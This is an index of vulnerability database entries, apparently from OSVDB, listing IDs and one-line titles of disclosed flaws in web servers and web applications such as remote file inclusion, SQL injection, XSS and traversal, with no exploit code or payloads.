[33633] Portail Web Php includes/includes.php site_path Parameter Remote File Inclusion
[33627] Microsoft Vista Speech Recognition Web Page Arbitrary Command Execution
[33609] OpenEMR interface/login/login_frame.php rootdir Parameter XSS
[33607] WebBuilder StageLoader.php GLOBALS[core][module_path] Parameter Remote File Inclusion
[33569] IBM WebSphere ibm_security_logout logoutExitPage Parameter Arbitrary URL Redirection
[33568] IBM WebSphere j_security_check Crafted POST Request Arbitrary URL Redirection
[33565] Novell GroupWise Web Server Content-Location Header Internal IP Disclosure
[33532] Macrovision FLEXnet Connect Update Service Agent isusweb.dll Overflow
[33531] Macrovision InstallShield InstallFromTheWeb Netscape Plug-in (npiftw32.dll) Remote Overflow
[33530] Macrovision InstallShield InstallFromTheWeb iftw.dll ActiveX Remote Overflow
[33529] Hitachi JP1/Cm2/Network Node Manager Web Utility Function Unspecified Issue
[33514] MiniWebsvr Multiple Unspecified Issues
[33513] MiniWebsvr Encoded Traversal Arbitrary File Access
[33512] MiniWebsvr Multiple Unspecified Overflows
[33483] Google Desktop Advanced Search Internal Web Server XSS
[33442] Durian Web Application Server Crafted Packet Remote Overflow
[33439] Magic Photo Storage Website user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion
[33438] Magic Photo Storage Website user/user_extend.php _config[site_path] Parameter Remote File Inclusion
[33437] Magic Photo Storage Website user/user_email.php _config[site_path] Parameter Remote File Inclusion
[33436] Magic Photo Storage Website user/user_catelog_password.php _config[site_path] Parameter Remote File Inclusion
[33435] Magic Photo Storage Website user/upload_photo.php _config[site_path] Parameter Remote File Inclusion
[33434] Magic Photo Storage Website user/register.php _config[site_path] Parameter Remote File Inclusion
[33433] Magic Photo Storage Website user/logout.php _config[site_path] Parameter Remote File Inclusion
[33432] Magic Photo Storage Website user/login.php _config[site_path] Parameter Remote File Inclusion
[33431] Magic Photo Storage Website user/index.php _config[site_path] Parameter Remote File Inclusion
[33430] Magic Photo Storage Website user/delete_category.php _config[site_path] Parameter Remote File Inclusion
[33429] Magic Photo Storage Website user/couple_profile.php _config[site_path] Parameter Remote File Inclusion
[33428] Magic Photo Storage Website user/couple_milestone.php _config[site_path] Parameter Remote File Inclusion
[33427] Magic Photo Storage Website user/change_catalog_template.php _config[site_path] Parameter Remote File Inclusion
[33426] Magic Photo Storage Website user/add_news.php _config[site_path] Parameter Remote File Inclusion
[33425] Magic Photo Storage Website user/add_category.php _config[site_path] Parameter Remote File Inclusion
[33423] Magic Photo Storage Website include/db_config.php _config[site_path] Parameter Remote File Inclusion
[33422] Magic Photo Storage Website include/config.php _config[site_path] Parameter Remote File Inclusion
[33421] Magic Photo Storage Website admin/send_email.php _config[site_path] Parameter Remote File Inclusion
[33420] Magic Photo Storage Website admin/membership_pricing.php _config[site_path] Parameter Remote File Inclusion
[33419] Magic Photo Storage Website admin/list_members.php _config[site_path] Parameter Remote File Inclusion
[33418] Magic Photo Storage Website admin/index.php _config[site_path] Parameter Remote File Inclusion
[33417] Magic Photo Storage Website admin/delete_member.php _config[site_path] Parameter Remote File Inclusion
[33416] Magic Photo Storage Website admin/approve_member.php _config[site_path] Parameter Remote File Inclusion
[33415] Magic Photo Storage Website admin/admin_paypal_email.php _config[site_path] Parameter Remote File Inclusion
[33414] Magic Photo Storage Website admin/add_templates.php _config[site_path] Parameter Remote File Inclusion
[33413] Magic Photo Storage Website admin/admin_email.php _config[site_path] Parameter Remote File Inclusion
[33412] Magic Photo Storage Website admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion
[33411] Magic Photo Storage Website admin/admin_password.php _config[site_path] Parameter Remote File Inclusion
[33401] Webulas db/db.mdb Direct Request Database Disclosure
[33303] TYPOlight webCMS Unspecified Major Security Issue
[33301] web-app.org WebAPP User Profiles Unspecified XSS
[33300] Avaya Multiple Products Unspecified Web Page Shell Command Injection
[33299] web-app.org WebAPP Search Form Input Unspecified Hijacking
[33298] web-app.org WebAPP Forum Archive Functionality Information Disclosure
[33296] web-app.org WebAPP Latest Member Personal Information Disclosure
[33295] web-app.org WebAPP Multiple Form Hidden Input Unspecified Issue
[33294] web-app.org WebAPP CAPTCHA Default Installation Weakness
[33293] web-app.org WebAPP White Space Arbitrary Real Name Spoofing
[33292] web-app.org WebAPP Unauthorized Guest Profile Modification
[33291] web-app.org WebAPP Edit Profile Forms Multiple Input Validation Issues
[33290] web-app.org WebAPP Search Results XSS
[33289] web-app.org WebAPP Statistics Log Viewer XSS
[33288] web-app.org WebAPP Feedback Pages XSS
[33287] web-app.org WebAPP Gallery Unspecified Input Filtering Weakness
[33286] web-app.org WebAPP Forum Post Icon Field HTML Injection
[33285] web-app.org WebAPP Unspecified Forms referrer Validation Weakness
[33284] web-app.org WebAPP Multiple Function E-mail Address Validation Weakness
[33283] web-app.org WebAPP Profiles Unspecified HTML Injection
[33282] web-app.org WebAPP Image Uploader Access Check Unspecified Weakness
[33281] web-app.org WebAPP Recent Searches Information Disclosure
[33279] web-app.org WebAPP Multiple Administrative Function Access Check Unspecified Weakness
[33277] web-app.org WebAPP Global Query String Filter Unspecified Weakness
[33276] web-app.org WebAPP Gallery Comments XSS
[33275] web-app.org WebAPP Admin Feature Unspecified XSS
[33273] web-app.org WebAPP Unspecified Cookie Manipulation Security Bypass
[33272] web-app.org WebAPP Multiple Unspecified Issues
[33240] cPanel WebHost Manager (WHM) scripts2/objcache obj Variable Arbitrary Limited File Overwrite
[33239] cPanel WebHost Manager (WHM) scripts/rearrangeacct domain Parameter XSS
[33238] cPanel WebHost Manager (WHM) scripts2/dofeaturemanager feature Parameter XSS
[33237] cPanel WebHost Manager (WHM) scripts2/limitbw domain Parameter XSS
[33236] cPanel WebHost Manager (WHM) scripts2/changeemail domain Parameter XSS
[33231] webSPELL printview.php topic Parameter SQL Injection
[33230] webSPELL index.php getsquad Parameter SQL Injection
[33229] webSPELL news.php showonly Parameter SQL Injection
[33204] WebTester Unspecified GET/POST SQL Injection
[33203] WebTester directions.php typeID Parameter SQL Injection
[33202] WebTester Multiple Unspecified XSS
[33191] MailEnable Web Mail Client link / IMG Tag CSRF
[33190] MailEnable Web Mail Client Forms/VCF/list.asp Multiple Parameter XSS
[33189] MailEnable Web Mail Client Forms/MAI/list.asp Multiple Parameter XSS
[33188] MailEnable Web Mail Client right.asp Multiple Parameter XSS
[33184] Aruba Mobility Controller Management Interface Login Prompt Credentials String Remote Overflow
[33174] Plain Old Webserver URI Traversal Arbitrary File Access
[33143] webSPELL ws_auth Cookie Authentication Bypass
[33126] Webmatic index/index_album.php Multiple Parameter Remote File Inclusion
[33118] J-Web Pics Navigator pn-menu.php dir Parameter Traversal Arbitrary File Access
[33117] J-Web Pics Navigator jwpn-photos.php dir Parameter Traversal Arbitrary File Access
[33015] Webfwlog include/debug.php conffile Variable Traversal Arbitrary File Source Disclosure
[32998] Hitachi Web Server Image Maps XSS
[32997] Hitachi Web Server HTTP Expect Header XSS
[32992] WebGUI www_purgeList Method Arbitrary Asset Deletion
[32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
[32973] Atozed IntraWeb TIWServerController Object Crafted HTTP Request DoS
[32965] CGI Rescue WebFORM Unspecified HTTP Header XSS
[32964] CGI Rescue WebFORM Unspecified XSS
[32961] Symantec Web Security (SWS) Blocked Page XSS
[32960] Symantec Web Security (SWS) Error Page XSS
[32951] FreeWebShop.org includes/login.php lang_file Parameter Remote File Inclusion
[32945] Website Baker class.login.php REMEMBER_KEY Cookie Parameter SQL Injection
[32928] WebGUI Operation/User.pm username Parameter XSS
[32893] Oracle E-Business Suite Web Applications Desktop Integrator Unspecified Issue
[32866] Fritz!DSL AR7 Web Server Traversal Arbitrary File Access
[32859] BEA WebLogic Malformed Headers Disk Space Consumption DoS
[32858] BEA WebLogic Manipulated Socket Connection Remote DoS
[32857] BEA WebLogic Portal Inadvertent Access Restriction Removal
[32856] BEA WebLogic Server Proxy Plug-in for NES Unspecified Remote DoS
[32824] FdWeB Espace Membre _admin/admin_menu.php path Parameter Remote File Inclusion
[32819] Okul Web Otomasyon Sistemi etkinlikbak.asp id Parameter SQL Injection
[32813] WebGUI Wiki Page Title XSS
[32803] Direct Web Remoting (DWR) Crafted Input Infinite Loop DoS
[32741] F5 FirePass vdesk/admincon/webyfiers.php Multiple Parameter XSS
[32718] MOTIONBORG Web Real Estate admin_check_user.asp txtUserName Parameter SQL Injection
[32681] Enthrallweb eShopping Cart products.asp categoryid Parameter SQL Injection
[32680] Enthrallweb eShopping Cart productdetail.asp ProductID Parameter SQL Injection
[32677] Online Web Building page.asp art_id Parameter SQL Injection
[32668] Magic Photo Storage Website include/common_function.php _config[site_path] Parameter Remote File Inclusion
[32662] Sun iPlanet Web Server /search NS-max-records XSS
[32658] Direct Web Remoting (DWR) Batch Request Resource Consumption DoS
[32657] Direct Web Remoting (DWR) Crafted Request include/exclude Check Bypass
[32639] Web Directory Pro admin/options.php Unauthorized Configuration Modification
[32638] Web Directory Pro admin/backup_db.php Database Disclosure
[32618] Business Card Web Builder (BCWB) system/default.css.php root_path_admin Parameter Remote File Inclusion
[32617] Business Card Web Builder (BCWB) dcontent/default.css.php root_path_admin Parameter Remote File Inclusion
[32616] Business Card Web Builder (BCWB) include/startup.inc.php root_path_admin Parameter Remote File Inclusion
[32537] AIDeX Mini-Webserver HTTP Request Saturation DoS
[32529] Joomla! plugins/search/weblinks.php where Parameter SQL Injection
[32508] WebText CMS wt/users/ im Variable Profile Edit (edycja) Arbitrary PHP Command Injection
[32501] Allied Telesis AT-9000/24 Management Interface VLAN Restriction Bypass
[32456] Enthrallweb eNews myprofile.asp Arbitrary Account Profile Manipulation
[32455] Enthrallweb eJobs newsdetail.asp ID Parameter SQL Injection
[32454] Enthrallweb ePages actualpic.asp Biz_ID Parameter SQL Injection
[32452] Enthrallweb ePhotos subLevel2.asp SUB_ID Parameter SQL Injection
[32451] Enthrallweb emates newsdetail.asp ID Parameter SQL Injection
[32404] @Mail Webmail Unspecified XSS
[32403] @Mail Webmail util.pl CSRF
[32392] Mono XSP for ASP.NET Server System.Web Class Web.Config Credential Disclosure
[32391] Mono XSP for ASP.NET Server System.Web Class %20 Request Script Source Code Disclosure
[32353] WebCalendar export_handler.php format Parameter XSS
[32332] phpMyWebmin upload_multi.php target Parameter Remote File Inclusion
[32331] phpMyWebmin upload_local.php target Parameter Remote File Inclusion
[32330] phpMyWebmin create_file.php target Parameter Remote File Inclusion
[32329] phpMyWebmin change_preferences2.php target Parameter Remote File Inclusion
[32255] Hitweb Multiple Script REP_CLASS Parameter Remote File Inclusion
[32143] IBM WebSphere Host On-Demand Multiple Script pnl Parameter Authentication Bypass
[32120] ColdFusion Web Server User-Agent HTTP Header Error Message XSS
[32090] Twilight Utilities Web Server (TW-webserver) GET Request Overflow DoS
[32075] Barman interface.php basepath Parameter Remote File Inclusion
[32044] cPanel WebHost Manager (WHM) scripts/passwdmysql password Parameter XSS
[32029] Trend Micro OfficeScan PCCSRV\Web_console\RemoteInstallCGI\CgiRemoteInstall.exe Remote Overflow
[32028] Trend Micro OfficeScan PCCSRV\Web_console\RemoteInstallCGI\Wizard.exe Remote Overflow
[31965] thttpd on Gentoo Linux Misconfigured Webroot Arbitrary File Access
[31904] WAWI /browse Interface Traversal Arbitrary File Access
[31849] Open WebMail (OWM) Unspecified XSS
[31848] Open WebMail (OWM) openwebmail-main.pl Multiple XSS
[31808] XEROX WorkCentre Products Web Services Request Persistant HTTP Connection
[31757] cPanel WebHost Manager (WHM) park ndomain Parameter XSS
[31756] cPanel WebHost Manager (WHM) dofeaturemanager feature Parameter XSS
[31755] cPanel WebHost Manager (WHM) editzone domain Parameter XSS
[31754] cPanel WebHost Manager (WHM) domts2 domain Parameter XSS
[31753] cPanel WebHost Manager (WHM) editpkg pkg Parameter XSS
[31752] cPanel WebHost Manager (WHM) addon_configsupport.cgi supporturl Parameter XSS
[31751] cPanel WebHost Manager (WHM) dochangeemail email Parameter XSS
[31720] SquirrelMail webmail.php mailto Parameter XSS
[31681] Enthrallweb eCars Types.asp Type_id SQL Injection
[31661] Mambo weblinks.php catid SQL Injection
[31660] UebiMiau Webmail error.php icq Parameter XSS
[31657] Simple Web Content Management System page.php id Parameter SQL Injection
[31650] Raindance Web Conferencing Pro failed browser XSS
[31628] Web Wiz Forums forum/search.asp KW Parameter SQL Injection
[31590] Mini Web Shop viewcategory.php catname Path Disclosure
[31589] Mini Web Shop viewcategory.php catname XSS
[31521] AlstraSoft Web Host Directory Database Download
[31520] AlstraSoft Web Host Directory Admin Passwod Modification
[31519] AlstraSoft Web Host Directory Invalid URI Path Disclosure
[31515] Enthrallweb eCoupons myprofile.asp MM_recordId Account Modification
[31413] Oracle Application Server Containers for J2EE Web Services Security Information Disclosure
[31366] Novell NetWare Welcome web-app Unspecified Filter Bypass
[31365] Novell NetWare Welcome web-app Unspecified XSS
[31222] OmniWeb Javascript alert() Function Format String
[31133] SolidState ServicesWebHostingPage.class.php base_path Parameter Remote File Inclusion
[31040] aspWebLinks links.asp txtAdministrativePassword Admin Password Modification
[30998] DEV Web Manager System index.php action Parameter XSS
[30953] ICQ Toolbar Configuration Webpage Origin Verification Failure
[30944] IBM WebSphere Application Server (WAS) SOAP Port Error Message XSS
[30935] IBM WebSphere Application Server (WAS) FFDC Log Cleartext Credential Disclosure (PK17589)
[30897] WebYep WYURL.php webyep_sIncludePath Parameter Remote File Inclusion
[30887] Jinzora media.php web_root Parameter Remote File Inclusion
[30879] PHP Top Webs config.php full_path Parameter Remote File Inclusion
[30862] phpWebSite Multiple Script PHPWS_SOURCE_DIR Parameter Remote File Inclusion
[30800] Web Server Creator index.php pg Parameter Remote File Inclusion
[30799] Web Server Creator customize.php l Parameter Remote File Inclusion
[30754] SAP Web Application Server enserver.exe Unspecified Remote DoS
[30753] SAP Web Application Server Unspecified Arbitrary File Access
[30751] web-app.org WebAPP Poll Form Submission Unspecified Input Validation Weakness
[30750] web-app.org WebAPP Search Feature Crafted Input Path Disclosure
[30749] web-app.org WebAPP Unspecified URL Manipulation Private Forum Authentication Bypass
[30748] web-app.org WebAPP Crafted URL Private Thread Last Post Disclosure
[30747] web-app.org WebAPP Search Feature Unspecified XSS
[30746] web-app.org WebAPP Search Feature Private Forum Disclosure
[30726] Apple Mac OS X WebKit HTML File Handling Remote Code Execution
[30694] MailEnable WebAdmin Blank Password Authentication Bypass
[30680] Wallpaper Website wallpaper.php wallpaperid Parameter SQL Injection
[30679] Recipes Website list.php categoryid Parameter SQL Injection
[30678] Recipes Website recipe.php recipeid Parameter SQL Injection
[30599] OpenEMR interface/login/login.php srcdir Parameter Remote File Inclusion
[30585] phpWebFTP script.js Information Disclosure
[30581] Enthrallweb eHomes result.asp Multiple Parameter XSS
[30580] Enthrallweb eHomes result.asp Multiple Parameter SQL Injection
[30579] Enthrallweb eHomes compareHomes.asp Multiple Parameter SQL Injection
[30578] Enthrallweb eHomes homeDetail.asp AD_ID Parameter SQL Injection
[30577] Enthrallweb eHomes types.asp TYPE_ID Parameter SQL Injection
[30576] Enthrallweb eHomes dirSub.asp sid Parameter SQL Injection
[30575] Enthrallweb eHomes dircat.asp cid Parameter SQL Injection
[30573] Enthrallweb eClassifieds dirSub.asp sid Parameter SQL Injection
[30572] Enthrallweb eClassifieds dircat.asp cid Parameter SQL Injection
[30571] Enthrallweb eClassifieds ad.asp Multiple Parameter SQL Injection
[30570] my little weblog weblog.php action Parameter XSS
[30534] IBM WebSphere Application Server (WAS) Unspecified Issue (PK30831)
[30533] IBM WebSphere Application Server (WAS) Eal4 Authentication Checking Issue
[30532] IBM WebSphere Application Server (WAS) Unspecified Issue (PK29725)
[30522] BestWebApp Dating Site login_form.asp msg Parameter XSS
[30521] BestWebApp Dating Site Login Component Multiple Field SQL Injection
[30503] phpWebThings core/editor.php Multiple Parameter Remote File Inclusion
[30485] Enthrallweb eShopping Cart subProducts.asp Multiple Parameter SQL Injection
[30484] Enthrallweb eShopping Cart productdetail.asp ProductID Parameter SQL Injection
[30483] Enthrallweb eShopping Cart reviews.asp ProductID Parameter SQL Injection
[30454] Selenium Server Web Server XSS
[30450] 4D WebSTAR libucache.dylib Path Subversion Privilege Escalation
[30430] WWWeb Concepts CactuShop product.asp product Parameter SQL Injection
[30429] WWWeb Concepts CactuShop prodtype.asp prodtype Parameter SQL Injection
[30352] BEA WebLogic Unspecified HTTP Request Smuggling Header Injection
[30264] REMLAB Web Mech Designer calculate.php Tonnage Parameter Path Disclosure
[30254] FreeWebshop.org Script index.php cat Parameter XSS
[30253] FreeWebshop.org Script index.php page Parameter Traversal Arbitrary File Access
[30241] bj Http Web Server Default Administrator Password
[30201] Webdrivers Simple Forum message_details.php id Parameter SQL Injection
[30195] apt-webshop-system message Parameter XSS
[30188] FreeWebshop.org Script index.php action Parameter Traversal Arbitrary File Access
[30187] FreeWebshop.org Script index.php Multiple Parameter SQL Injection
[30174] Easy Address Book Web Server Crafted Request ADS Arbitrary File Access
[30166] Sun ONE/Java System Web Server NSS Unspecified Remote DoS
[30164] BlooMooWeb ActiveX control (AidemATL.dll) BW_DeleteTempFile Method filePath Parameter Arbitrary File Deletion
[30163] BlooMooWeb ActiveX control (AidemATL.dll) BW_LaunchGame Method bstrParams Parameter Arbitrary Local File Execution
[30162] BlooMooWeb ActiveX control (AidemATL.dll) BW_DownloadFile Method bstrUrl Parameter Arbitrary File Download
[30150] Easy File Sharing Web Server Crafted Request ADS Arbitrary File Access
[30149] Easy File Sharing Web Server Forum Post Multiple Field XSS
[30131] Simple Website Software common.php SWSDIR Parameter Remote File Inclusion
[30076] INCA IM-204 webcm getpage Traversal Arbitrary File Access
[30062] MDweb country_insert.php chemin_appli Parameter Remote File Inclusion
[30061] MDweb form_org.inc.php chemin_appli Parameter Remote File Inclusion
[30056] MiniHTTP Web Forum join.asp Arbitrary Account Manipulation
[30049] Sun Java System Messaging Server Webmail Message XSS
[30045] D-Link DSL-G624T cgi-bin/webcm Multiple Variable POST Method XSS
[30044] D-Link DSL-G624T cgi-bin/webcm getpage Parameter Traversal Arbitrary File Access
[29999] Novell GroupWise WebAccess ndsobj.nlm Information Disclosure
[29969] Trawler Web CMS extras/downloads/index.php path_red Parameter Remote File Inclusion
[29968] Trawler Web CMS share/insert1.php path_scr_dat2 Parameter Remote File Inclusion
[29967] Trawler Web CMS richtext/newfile.php path_red2 Parameter Remote File Inclusion
[29966] Trawler Web CMS richtext/lese_inc.php path_red2 Parameter Remote File Inclusion
[29965] Trawler Web CMS richtext/farbpalette.php path_red2 Parameter Remote File Inclusion
[29964] Trawler Web CMS richtext/extras_menu.php path_red2 Parameter Remote File Inclusion
[29963] Trawler Web CMS richtext/colorpik3.php path_red2 Parameter Remote File Inclusion
[29962] Trawler Web CMS richtext/colorpik2.php path_red2 Parameter Remote File Inclusion
[29961] Trawler Web CMS richtext/addtort.php path_red2 Parameter Remote File Inclusion
[29960] Trawler Web CMS redaktion/artikel/up/index.php path_red2 Parameter Remote File Inclusion
[29882] iWebNegar comments.php id Parameter SQL Injection
[29881] iWebNegar comments.php comment Parameter XSS
[29846] Comdev Web Blogger adminfoot.php path[docroot] Parameter Remote File Inclusion
[29765] Motorola SURFboard SB4200 HTTP Interface Crafted MfcISAPICommand Request DoS
[29755] IronMail IronWebMail IM_FILE Identifier Encoded Traversal Arbitrary File Access
[29731] NuralStorm Webmail process.php DEFAULT_SKIN Parameter Remote File Inclusion
[29722] SafeWord RemoteAccess signers.cfg UserCenter Webportal Password Cleartext Disclosure
[29721] SafeWord RemoteAccess login.conf UserCenter Webportal base-64 Encoded Password Disclosure
[29664] WebYep webyep.php webyep_sIncludePath Parameter Remote File Inclusion
[29663] WebYep WYShortTextElement.php webyep_sIncludePath Parameter Remote File Inclusion
[29662] WebYep WYMenuElement.php webyep_sIncludePath Parameter Remote File Inclusion
[29661] WebYep WYLoopElement.php webyep_sIncludePath Parameter Remote File Inclusion
[29660] WebYep WYLongTextElement.php webyep_sIncludePath Parameter Remote File Inclusion
[29659] WebYep WYLogonButtonElement.php webyep_sIncludePath Parameter Remote File Inclusion
[29658] WebYep WYImageElement.php webyep_sIncludePath Parameter Remote File Inclusion
[29657] WebYep WYGuestbookElement.php webyep_sIncludePath Parameter Remote File Inclusion
[29656] WebYep WYGalleryElement.php webyep_sIncludePath Parameter Remote File Inclusion
[29655] WebYep WYTextArea.php webyep_sIncludePath Parameter Remote File Inclusion
[29654] WebYep WYSelectMenu.php webyep_sIncludePath Parameter Remote File Inclusion
[29653] WebYep WYPopupWindowLink.php webyep_sIncludePath Parameter Remote File Inclusion
[29652] WebYep WYPath.php webyep_sIncludePath Parameter Remote File Inclusion
[29651] WebYep WYLink.php webyep_sIncludePath Parameter Remote File Inclusion
[29650] WebYep WYLanguage.php webyep_sIncludePath Parameter Remote File Inclusion
[29649] WebYep WYImage.php webyep_sIncludePath Parameter Remote File Inclusion
[29648] WebYep WYHTMLTag.php webyep_sIncludePath Parameter Remote File Inclusion
[29647] WebYep WYFile.php webyep_sIncludePath Parameter Remote File Inclusion
[29646] WebYep WYElement.php webyep_sIncludePath Parameter Remote File Inclusion
[29645] WebYep WYEditor.php webyep_sIncludePath Parameter Remote File Inclusion
[29644] WebYep WYDocument.php webyep_sIncludePath Parameter Remote File Inclusion
[29643] WebYep WYApplication.php webyep_sIncludePath Parameter Remote File Inclusion
[29615] IBM WebSphere Application Server (WAS) Unspecified Security Exposure (PK29360)
[29614] IBM WebSphere Application Server (WAS) Wsn Security Authentication Bypass
[29613] IBM WebSphere Application Server (WAS) Unspecified JSP Source Disclosure (PK23475)
[29587] Webmedia Explorer includes/core.lib.php path_include Parameter Remote File Inclusion
[29507] XEROX WorkCentre ESS/ Network Controller / MicroServer Web Server Arbitrary Command Execution
[29480] WEBInsta CMS modules/usersonline/users.php module_dir Parameter Remote File Inclusion
[29476] WebTorrent torrents.php cat Parameter SQL Injection
[29368] TinyWebGallery image.php2 image Parameter Remote File Inclusion
[29367] TinyWebGallery image.php image Parameter Remote File Inclusion
[29303] Comdev Web Blogger include.php path[docroot] Parameter Remote File Inclusion
[29279] phpMyWebmin window.php Multiple Parameter Remote File Inclusion
[29278] phpMyWebmin home.php target Variable Arbitrary Directory Listing
[29277] phpMyWebmin window.php target Variable Arbitrary Directory Listing
[29273] Apple Mac OS X Preferences Account Manipulation WebObjects Application Privilege Persistence
[29257] NaviCOPA Web Server GET Request Remote Overflow
[29234] CERN httpd Double Slash Protected Webpage Bypass
[29227] WEB//NEWS parser.php WN_BASEDIR Parameter Remote File Inclusion
[29223] Sun Secure Global Desktop ttawebtop.cgi XSS
[29207] Pie Cart Pro weblinks.php Inc_Dir Parameter Remote File Inclusion
[29191] WEBInsta Mailing List Manager install3.php cabsolute_path Parameter Remote File Inclusion
[29142] Neon WebMail for Java updateuser Servlet in_name Parameter XSS
[29141] Neon WebMail for Java downloadfile Servlet Traversal Arbitrary File Access
[29140] Neon WebMail for Java updateuser Servlet in_id Variable Arbitrary User Information Modification
[29139] Neon WebMail for Java maillist Servlet Multiple Parameter SQL Injection
[29138] Neon WebMail for Java addrlist Servlet Multiple Parameter SQL Injection
[29137] Neon WebMail for Java updatemail Servlet Arbitrary Mail Message Manipulation
[29136] Neon WebMail for Java File Attachment Arbitrary JSP Execution
[29106] Web-News template.php content_page Parameter Remote File Inclusion
[29103] xweblog kategori.asp kategori Parameter SQL Injection
[29088] SQLiteWebAdmin table_editfield.php table Parameter SQL Injection
[29087] SQLiteWebAdmin tpl.inc.php conf[classpath] Parameter Remote File Inclusion
[29086] SaveWebPortal poll/view_polls.php SITE_Path Parameter Remote File Inclusion
[29085] SaveWebPortal poll/poll.php SITE_Path Parameter Remote File Inclusion
[29037] Cisco IPS/IDS Web Administration Malformed SSLv2 Client Hello DoS
[29025] DigitalWebShop rechnung.php _PHPLIB[libdir] Parameter Remote File Inclusion
[29023] Dr.Web Anti-virus LHA Archive Directory Name Overflow
[29022] Business Card Web Builder (BCWB) startup.inc.php root_path Parameter Remote File Inclusion
[29009] CA eSCC / eTrust Audit Web Server Path Disclosure
[28945] Easy Address Book Web Server Query Remote Format String
[28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
[28895] Oracle WebDAV Unspecified HTTP DoS
[28874] Oracle E-Business Suite Self-Service Web Applications icx_ticket Authentication Bypass
[28804] webSPELL admin/database.php userID Parameter Database Disclosure
[28803] webSPELL squads.php squadID Parameter SQL Injection
[28760] Caucho Resin /WEB-INF/ Crafted Request Authentication Bypass
[28749] MyABraCaDaWeb pop.php base Parameter Remote File Inclusion
[28748] MyABraCaDaWeb index.php base Parameter Remote File Inclusion
[28743] Mono/C# Web Server mod_mono xsp Component Traversal Arbitrary File Access
[28673] D-Link DSL-G604T /cgi-bin/webcm getpage Parameter Traversal Arbitrary File Access
[28548] Alt-N WebAdmin useredit_account.wdm Module MDaemon Account Access
[28547] Web Dictate Null Password Authentication Bypass
[28394] Indexu admin/checkurl_web.php Multiple Parameter Remote File Inclusion
[28375] SnapGear web-admin Server Unspecified Race Condition
[28374] SnapGear web-admin Unspecified Issue
[28338] Webmin/Usermin NULL Character Unspecified XSS
[28337] Webmin/Usermin NULL Character Unspecified Source Disclosure
[28300] SAP DB / MaxDB WebDBM Client Database Name Remote Overflow
[28294] 04WebServer CGI Source Disclosure
[28293] 04WebServer Unspecified OpenSSL Data Request DoS
[28292] 04WebServer URL Processing Unspecified Information Disclosure
[28248] Web3news _class.security.php PHPSECURITYADMIN_PATH Parameter Remote File Inclusion
[28192] Webvizyon Portal SayfalaAltList.asp ID Parameter SQL Injection
[28171] 2Wire Gateway Web Server CRLF DoS
[28124] Alt-N WebAdmin Administrator Privilege Mismatch Unauthorized Account Manipulation
[28123] Alt-N WebAdmin logfile_view.wdm file Parameter Traversal Arbitrary File Access
[28122] Alt-N WebAdmin configfile_view.wdm file Parameter Traversal Arbitrary File Access
[28109] Sun Java Plugin and Web Start Version Specification Weakness
[28039] Archangel Weblog Multiple Field XSS
[27948] WEBInsta CMS index.php templates_dir Parameter Remote File Inclusion
[27941] 04WebServer Unspecified User Identification Bypass
[27940] 04WebServer Error Page XSS
[27928] Webring for Joomla admin.webring.docs.php component_dir Parameter Remote File Inclusion
[27918] Douran FollowWeb register.aspx XSS
[27909] Symantec Backup Exec Remote Agent RPC Interface Multiple Unspecified Overflows
[27907] SaralBlog view.php website XSS
[27892] IBM WebSphere Application Server (WAS) LDAP Lookup Cached Response Unspecified Issue
[27891] IBM WebSphere Application Server (WAS) Trace Information Disclosure
[27890] IBM WebSphere Application Server (WAS) wsadmin Command Line Information Disclosure
[27889] IBM WebSphere Application Server (WAS) Unspecified mbean Issue
[27888] IBM WebSphere Application Server (WAS) ThreadIdentitySupport Unspecified Authority Issue
[27887] IBM WebSphere Application Server (WAS) SOAP Request/Response Unspecified Issue
[27880] Hitweb genpage-cgi.php REP_INC Parameter Remote File Inclusion
[27857] Comet WebFileManager (CWFM) CheckUpload.php Language Parameter Remote File Inclusion
[27820] Novell GroupWise WebAccess Login Page GWAP.version Parameter XSS
[27819] Novell GroupWise WebAccess Malformed SCRIPT Tag XSS
[27818] Novell GroupWise WebAccess UTF-7 Encoded Message XSS
[27808] Cisco Linksys WRT54G Web Admin Console CSRF
[27787] CA eTrust Antivirus WebScan ActiveX Control Update Manifest Processing Overflow
[27786] CA eTrust Antivirus WebScan ActiveX Control Crafted File Protection Weakness
[27785] CA eTrust Antivirus WebScan ActiveX Control Crafted File Update Subversion
[27744] Apple Mac OS X WebKit Malformed HTML Deallocated Object Access DoS
[27696] VMware ESX Server Web Server Log Cleartext Password Disclosure
[27695] VMware ESX Server Management Interface Session Cookie Password Encryption Weakness
[27671] aWebNews login.php page Parameter Arbitrary File Access
[27670] aWebNews visview.php path_to_news Parameter Remote File Inclusion
[27598] IBM WebSphere Form-based Authentication Multiple Variable Remote Overflow
[27587] Sun Java System Application/Web Server Unspecified Arbitrary File Disclosure
[27577] Mozilla Multiple Products nsQueryInterface::operator() Function Removed Node Reference Code Execution
[27531] Novell GroupWise WebAccess webacc Multiple Parameter XSS
[27505] WeBBoA Hosting id Parameter SQL Injection
[27390] WebScarab Proxy XSS
[27330] IceWarp WebMail admin/inc/include.php lang_settings Parameter Traversal Local File Inclusion
[27329] IceWarp WebMail /mail/settings.html language Parameter Traversal Local File Inclusion
[27328] IceWarp WebMail accounts/inc/include.php language Parameter Traversal Local File Inclusion
[27159] Cisco Router Web Setup (CRWS) Default Configuration Authentication Bypass
[27141] CMS Mundo Webshop Module id Parameter SQL Injection
[27138] Drupal webform Module XSS
[27131] Juniper Networks DX System Web Admin Log Script XSS
[27116] MIMEsweeper for Web Encrypted RAR Processing DoS
[27115] MIMEsweeper for Web Blocked Site Message XSS
[27110] Microsoft IE WebViewFolderIcon setSlice Overflow
[27077] ASPjar Guestbook Message Web Site Field XSS
[27076] askSam Web Publisher Nonexistent File Request Path Disclosure
[27075] askSam Web Publisher as_web4.exe XSS
[27074] askSam Web Publisher as_web.exe XSS
[27040] WebEx Downloader Plug-in ActiveX Unspecified Remote Code Execution
[27039] WebEx Downloader Plug-in ActiveX/Java Source Subversion Arbitrary Program Execution
[27009] PHPWebGallery comments.php keyword Parameter XSS
[26912] Joomla! Weblinks Feature SQL Injection
[26880] Cisco Wireless Control System (WCS) HTTP Interface Login Page Unspecified XSS
[26843] Dating Agent PRO webmaster/index.php login Parameter XSS
[26772] Webmin/Usermin simplify_path() Failure Arbitrary File Disclosure
[26771] Webmin on Windows Crafted Backslash Request Traversal Arbitrary File Access
[26766] Open WebMail (OWM) openwebmail-read.pl from Parameter XSS
[26764] IBM WebSphere Application Server (WAS) Unspecified UserNameToken Cache Improper Use
